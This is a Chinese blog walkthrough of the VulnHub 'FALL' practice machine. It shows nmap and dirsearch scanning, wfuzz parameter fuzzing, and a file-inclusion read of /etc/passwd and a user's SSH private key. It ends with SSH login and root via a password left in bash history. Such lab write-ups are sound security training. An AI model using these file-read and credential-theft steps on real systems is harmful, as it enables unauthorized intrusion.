FALL靶机攻略

1.下载靶机,导入靶机

下载地址:https://download.vulnhub.com/digitalworld/FALL.7z

开启靶机。

2. 靶机、kali设置NAT网卡模式

3. kali扫描NAT网卡段的主机

kali主机

nmap扫描:nmap 192.168.92.1/24

判断出靶机ip是192.168.92.133。开启端口:22、80、139、443、445、3306、9090。

4. 访问开启的端口

80端口,页面是一些消息。

在多条消息记录中,多次发现Posted:qiu。猜测“qiu”可能是一个用户。

139端口被限制,无法访问

9090发现服务器登录框,但无数据登录

5. 扫描敏感目录

 dirsearch -u "http://192.168.92.133"

发现多个页面,/admin/login.php、/assets/、config.php、phpinfo.php、robots.txt、test.php。

6. 访问网页

/assets/,发现目录,但里面没有任何信息        /phpinfo.php、/config.php  页面无显示

/robots.txt  无敏感信息

/test.php页面,弹窗显示:缺少GET传参。说明这里存在注入。尝试寻找参数。

查看网页源代码发现没有。

7.爆破/test.php页面的参数

使用kali的wfuzz工具可以爆破,同时wfuzz自带字典。

在/usr/share/wfuzz/wordlist/general目录下存在多个字典,这里使用big.txt。

cat big.txt

爆破参数:

wfuzz -u "http://192.168.92.133/test.php?FUZZ" -w /usr/share/wfuzz/wordlist/general/big.txt --hh 80

爆破出payload结果为:file

8. 利用file参数 查看文件/etc/passwd

http://192.168.92.133/test.php?file=/etc/passwd

发现 /bin/bash  可登录用户  只有root  和  qiu ,这里证明之前看到的qiu的确是用户。

9.  查看qiu的 ssh 密钥

http:/192.168.92.133/test.php?file=/home/qiu/.ssh/id_rsa

10. 将ssh连接私钥的页面内容下载到kali

输入:curl http:/192.168.92.133/test.php?file=/home/qiu/.ssh/id_rsa > id_rsa

11.利用用户qiu和ssh私钥进行连接靶机

查看文件权限:ls -l   发现id_rsa文件没有执行权限

远程连接:ssh -i id_rsa qiu@192.168.92.133

但这里warning说,私钥不能被其他人使用  

所以修改权限,只有其拥有者才有权限,其他人无权限。即600

修改私钥文件权限:chmod 600 id_rsa            【

【600:即 - rw- --- ---】【用户有:rw- , 属组和其他人均无任何权限---】

再次连接:

ssh -i id_rsa qiu@192.168.92.133   连接成功

执行whoami命令,发现是qiu

12.查看历史命令,寻找其他敏感信息

cat .bash_history

竟然发现  sudo  强行提权的信息,存在可疑密码“remarkablyawesomE”

利用这个疑似密码,尝试提权

输入:su - root,密码:remarkablyawesomE

提权成功,执行whoami,得到是root用户。

FALL靶机练习结束!!!

温馨拓展:FALL 有 秋天 的意思哦!!!  金黄的树叶、赤红的枫叶,秋天的风景不错呦。

    这次靶机,开局很轻松,ip很容易扫描出来,但给的目录很多,解决方法或许也很多。但本人参考其他攻略,按这种方法练习下来。仅供参考。。。希望有所帮助。

                                                                                                    --------------------2025/3/27  21:41

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/899234.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

notepad++代码查看器分享

文章目录 📝 Notepad 简介🔧 主要特点打开.c文件示意高亮语法展示全局替换功能展示 📝 Notepad 简介 Notepad 是一款 免费的开源文本编辑器和源代码编辑器,运行在 Windows 系统上。 它是对 Windows 自带“记事本”的增强版本&…

详细介绍Spring MVC的执行流程是怎么样的?

Spring MVC 是 Spring 框架的一部分,用于构建 Web 应用程序。它的执行流程如下: 前端控制器(DispatcherServlet)接收请求:用户通过浏览器发送 HTTP 请求到服务器,请求首先被前端控制器 DispatcherServlet 接…

MySQL中的内连接与外连接详解:基础与进阶应用

文章目录 表的内连和外连(重点)内连接外连接左外连接右外连接 简单回顾 表的内连和外连(重点) 表的连接分为内连和外连 内连接 内连接实际上就是利用where子句对两种表形成的笛卡儿积进行筛选,我们前面学习的查询都…

动态内存分配与内存对齐

在C语言及其他低级编程语言中,内存管理是一个至关重要的主题。动态内存分配和内存对齐是确保程序高效和稳定运行的关键因素。本文将深入探讨动态内存分配的原理,内存对齐的概念,并解释它们如何共同影响程序的性能和资源利用。 一、动态内存分配简介 1.1 动态内存分配的概念…

Milvus×最新版DeepSeek v3:对标Claude,本地数据五分钟写网站

前言 就在昨晚,DeepSeek v3推出了新版本V3-0324,再次一夜爆火。 虽然官方表示“这只是一次小升级”“API接口和使用方式不变”,但经过Zilliz的第一时间实测,我们发现无论是逻辑能力,还是编程能力,相较原本的…

6.M-LAG专题

M-LAG 的作用及特点 能不能简单的描述以下M-LAG的工作原理? 跨设备链路聚合,将两台物理设备在聚合层面虚拟成一台设备来实现跨设备链路聚合,从而提供设备级冗余保护和流量负载分担 M-LAG(跨设备链路聚合)是基于IEEEP802.1A协议的跨设备链路聚合技术。…

每日免费分享之精品wordpress主题系列~DAY16

主题介绍: 今日在网上寻找wordpress主题的时候逛到了大叔的网站,赶脚这个主题蛮不错的,于是百度一下,果然,这个主题很受欢迎。作为主题下载站追梦者也不甘落后,马上就发布出来了,希望对你们有用…

LeeCode 383. 赎金信

给你两个字符串:ransomNote 和 magazine ,判断 ransomNote 能不能由 magazine 里面的字符构成。 如果可以,返回 true ;否则返回 false 。 magazine 中的每个字符只能在 ransomNote 中使用一次。 示例 1: 输入&#…

目标检测20年(一)

今天看的文献是《Object Detection in 20 Years: A Survey》,非常经典的一篇目标检测文献,希望通过这篇文章学习到目标检测的基础方法并提供一些创新思想。 论文链接:1905.05055 目录 一、摘要 1.1 原文 1.2 翻译 二、介绍 三、目标检测…

分割 / 合并大文件的简单 python 代码

使用方法 分割: python fs.py -n <分割后的文件个数> <要分割的文件> 合并: python fs.py -m <分割文件1> <分割文件2> ... 示例 PS C:\Users\Administrator\Desktop> python fs.py 使用方法: 分割: python fs.py -n <分割后的文件个数> &…

IDEA 快捷键ctrl+shift+f 无法全局搜索内容的问题及解决办法

本篇文章主要讲解IDEA、phpStrom、webStrom、pyCharm等jetbrains系列编辑器无法进行全局搜索内容问题的主要原因及解决办法。 日期&#xff1a;2025年3月22日 作者&#xff1a;任聪聪 现象描述&#xff1a; 1.按下ctrlshiftf 输入法转为了繁体。 2.快捷键ctrlshiftr 可以全局检…

树状数组【数据结构】

树状数组 简介 1.应用 1.单点修改区间查询 2.区间修改单点查询(差分) 3.区间修改区间查询(差分公式) 总而言之,就是动态维护前缀和。 2.树状结构图 3.lowbit函数 我们知道&#xff0c;任何一个正整数都可以被表示成一个二进制数。如&#xff1a; ( 2 ) 10 ( 10 ) 2 (2)_{10…

pytorch+maskRcnn框架训练自己的模型以及模型导出ONXX格式供C++部署推理

背景 maskrcnn用作实例分割时&#xff0c;可以较为精准的定位目标物体&#xff0c;相较于yolo只能定位物体的矩形框而言&#xff0c;优势更大。虽然yolo的计算速度更快。 直接开始从0到1使用maskrCNN训练自己的模型并并导出给C部署&#xff08;亲测可用&#xff09; 数据标注…

PCL配置

1、下载 打开GitHub网站&#xff0c;搜索pcl&#xff0c;选择第一个结果打开&#xff0c;按照下图步骤操作 下载PCL预编译安装程序PCL-1.13.1-AllInOne-msvc2022-win64.exe 和要安装的PCL组件&#xff08;例如pcl-1.13.1-pdb-msvc2022-win64.zip&#xff09; 2、安装 双击 P…

大模型tokenizer重构流程

大模型tokenizer层再训练&#xff08;选取Qwen7B试验&#xff0c;重构token层&#xff09; 最近公司可能想训练一个蛋白质大模型&#xff0c;需要了解一下大模型tokenizer重构&#xff0c;之后可能要训练&#xff0c;这里做了一定的总结。 文章目录 1. 首先查看Qwen2.5 7B基本…

Android设计模式之单例模式

一、定义&#xff1a;确保一个类只有一个实例&#xff0c;并且自动实例化&#xff0c;并向整个系统提供这个实例。 二、使用场景&#xff1a;避免重复创建对象&#xff0c;过多消耗系统资源。 三、使用方式 3.1饿汉式&#xff1a;类加载时立即初始化&#xff0c;线程安全&…

docker ssh远程连接

目录 操作命令&#xff1a; 确保 SSH 配置允许 root 登录&#xff1a; docker提交&#xff1a; 操作命令&#xff1a; # 进入容器 docker exec -ti lbg04 /bin/bash# 更新包管理并安装 SSH 服务&#xff08;Ubuntu/Debian 示例&#xff09; apt-get update apt-get install…

关于matlab和python谁快的问题

关于matlab和python谁快的问题&#xff0c;python比matlab在乘法上快10倍&#xff0c;指数计算快4倍&#xff0c;加减运算持平&#xff0c;略慢于matlab。或许matlab只适合求解特征值。 import torch import timen 50000 # 矩阵规模 M torch.rand(n, 31)start_time time.t…

准确--配置服务器文件数

某些系统可能在 /etc/security/limits.d/ 目录下有额外配置覆盖全局设置。检查是否存在冲突文件&#xff1a; ls /etc/security/limits.d/如果有文件&#xff08;如 90-nproc.conf 或 90-nofile.conf&#xff09;&#xff0c;需编辑或删除这些文件中的冲突配置。 确保系统启用…

VectorBT:使用PyTorch+LSTM训练和回测股票模型 进阶一

VectorBT&#xff1a;使用PyTorchLSTM训练和回测股票模型 进阶一 本文介绍了如何使用PyTorch和LSTM模型进行股票数据的训练和回测。涵盖了数据预处理、特征选择、LSTM模型构建、模型训练与验证、动态阈值策略生成交易信号以及使用VectorBT进行回测和绩效分析。 文中内容仅限技术…